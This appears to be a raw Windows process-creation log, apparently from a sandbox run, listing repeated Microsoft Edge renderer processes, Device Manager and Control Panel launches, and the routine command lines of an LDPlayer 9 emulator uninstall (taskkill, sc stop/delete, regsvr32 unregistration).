"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,13210980290968165538,1784862910098140377,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3284 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,13210980290968165538,1784862910098140377,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7144 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,13210980290968165538,1784862910098140377,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6904 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,13210980290968165538,1784862910098140377,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6200 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,13210980290968165538,1784862910098140377,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5612 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,13210980290968165538,1784862910098140377,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6140 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,13210980290968165538,1784862910098140377,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=30 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3260 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,13210980290968165538,1784862910098140377,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=31 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2848 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,13210980290968165538,1784862910098140377,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=32 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7008 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,13210980290968165538,1784862910098140377,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=33 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7264 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,13210980290968165538,1784862910098140377,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=34 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5876 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,13210980290968165538,1784862910098140377,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=35 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5928 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,13210980290968165538,1784862910098140377,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=36 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7356 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,13210980290968165538,1784862910098140377,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=37 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7476 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,13210980290968165538,1784862910098140377,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=38 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7600 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,13210980290968165538,1784862910098140377,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=39 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8112 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,13210980290968165538,1784862910098140377,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=40 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8056 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,13210980290968165538,1784862910098140377,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=41 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8448 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,13210980290968165538,1784862910098140377,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=42 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8560 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,13210980290968165538,1784862910098140377,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=43 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8716 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,13210980290968165538,1784862910098140377,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=44 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8104 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,13210980290968165538,1784862910098140377,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=45 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8068 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,13210980290968165538,1784862910098140377,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=46 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8436 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,13210980290968165538,1784862910098140377,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=47 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6236 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,13210980290968165538,1784862910098140377,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=48 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8528 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,13210980290968165538,1784862910098140377,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=49 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6400 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,13210980290968165538,1784862910098140377,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=50 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5824 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,13210980290968165538,1784862910098140377,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=51 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6484 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,13210980290968165538,1784862910098140377,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=52 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8964 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,13210980290968165538,1784862910098140377,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=53 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7820 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,13210980290968165538,1784862910098140377,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=54 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9480 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,13210980290968165538,1784862910098140377,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=55 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8584 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,13210980290968165538,1784862910098140377,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=56 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8280 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,13210980290968165538,1784862910098140377,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=57 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8268 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,13210980290968165538,1784862910098140377,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=58 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8480 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,13210980290968165538,1784862910098140377,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=59 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9472 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,13210980290968165538,1784862910098140377,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=60 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7348 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,13210980290968165538,1784862910098140377,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=61 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7616 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,13210980290968165538,1784862910098140377,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=62 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5996 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,13210980290968165538,1784862910098140377,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=63 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7152 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,13210980290968165538,1784862910098140377,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=64 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8320 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,13210980290968165538,1784862910098140377,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=65 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6944 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,13210980290968165538,1784862910098140377,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=66 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7384 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,13210980290968165538,1784862910098140377,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=67 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9192 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,13210980290968165538,1784862910098140377,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=68 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9176 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,13210980290968165538,1784862910098140377,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=69 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9428 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,13210980290968165538,1784862910098140377,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=70 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9448 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,13210980290968165538,1784862910098140377,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=71 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9080 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,13210980290968165538,1784862910098140377,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=72 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8720 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,13210980290968165538,1784862910098140377,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=73 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7836 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,13210980290968165538,1784862910098140377,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=74 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8808 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,13210980290968165538,1784862910098140377,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=75 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9388 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,13210980290968165538,1784862910098140377,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=76 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8336 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,13210980290968165538,1784862910098140377,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=77 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5004 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,13210980290968165538,1784862910098140377,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=78 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6480 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,13210980290968165538,1784862910098140377,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=79 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7692 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,13210980290968165538,1784862910098140377,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=80 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9808 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2140,13210980290968165538,1784862910098140377,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=8804 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,13210980290968165538,1784862910098140377,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=83 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8788 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2140,13210980290968165538,1784862910098140377,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=7216 /prefetch:8

C:\Windows\system32\control.exe

"C:\Windows\system32\control.exe" /name Microsoft.DeviceManager

C:\Windows\SysWOW64\DllHost.exe

C:\Windows\SysWOW64\DllHost.exe /Processid:{06622D85-6856-4460-8DE1-A81921B41C4B}

C:\Windows\system32\mmc.exe

"C:\Windows\system32\mmc.exe" C:\Windows\system32\devmgmt.msc

C:\Windows\System32\control.exe

"C:\Windows\System32\control.exe" "C:\Windows\system32\appwiz.cpl",

C:\Windows\system32\rundll32.exe

"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Windows\system32\appwiz.cpl",

C:\Windows\SysWOW64\DllHost.exe

C:\Windows\SysWOW64\DllHost.exe /Processid:{06622D85-6856-4460-8DE1-A81921B41C4B}

C:\Windows\explorer.exe

C:\Windows\explorer.exe /factory,{5BD95610-9434-43C2-886C-57852CC8A120} -Embedding

C:\Windows\SysWOW64\DllHost.exe

C:\Windows\SysWOW64\DllHost.exe /Processid:{FCC74B77-EC3E-4DD8-A80B-008A702075A9}

F:\LDPlayer\LDPlayer9\dnuninst.exe

"F:\LDPlayer\LDPlayer9\dnuninst.exe"

C:\Windows\SysWOW64\taskkill.exe

"C:\Windows\System32\taskkill.exe" /F /IM adb.exe /T

C:\Windows\SysWOW64\taskkill.exe

"C:\Windows\System32\taskkill.exe" /F /IM aapt.exe

C:\Windows\SysWOW64\taskkill.exe

"C:\Windows\System32\taskkill.exe" /F /IM ldrecord.exe

C:\Windows\SysWOW64\taskkill.exe

"C:\Windows\System32\taskkill.exe" /F /IM dndscd.exe

C:\Windows\SysWOW64\taskkill.exe

"C:\Windows\System32\taskkill.exe" /F /IM fynews.exe

C:\Windows\SysWOW64\taskkill.exe

"C:\Windows\System32\taskkill.exe" /F /IM ldnews.exe

F:\LDPlayer\LDPlayer9\dnrepairer.exe

"F:\LDPlayer\LDPlayer9\\dnrepairer.exe" cmd=uninstall

C:\Program Files\ldplayer9box\Ld9BoxSVC.exe

"C:\Program Files\ldplayer9box\Ld9BoxSVC.exe" /UnregServer

C:\Windows\SysWOW64\regsvr32.exe

"regsvr32" "C:\Program Files\ldplayer9box\x86\VBoxClient-x86.dll" /s /u

C:\Windows\SYSTEM32\regsvr32.exe

"regsvr32" "C:\Program Files\ldplayer9box\VBoxC.dll" /s /u

C:\Windows\SysWOW64\sc.exe

"C:\Windows\system32\sc" stop Ld9BoxSup

C:\Windows\SysWOW64\sc.exe

"C:\Windows\system32\sc" delete Ld9BoxSup

C:\Windows\SysWOW64\sc.exe

"C:\Windows\system32\sc" stop Ld9BoxNetLwf

C:\Program Files\ldplayer9box\NetLwfUninstall.exe

"C:\Program Files\ldplayer9box\NetLwfUninstall.exe"

C:\Windows\SysWOW64\taskkill.exe

"taskkill" /F /IM dnmultiplayerex.exe

C:\Users\Admin\AppData\Local\Temp\ld\lduninst_del.exe

"C:\Users\Admin\AppData\Local\Temp\ld\lduninst_del.exe" F:\LDPlayer\LDPlayer9\

C:\Windows\System32\rundll32.exe

C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,13210980290968165538,1784862910098140377,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=86 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10016 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,13210980290968165538,1784862910098140377,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=87 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4316 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,13210980290968165538,1784862910098140377,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=88 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3124 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,13210980290968165538,1784862910098140377,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=89 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8020 /prefetch:1

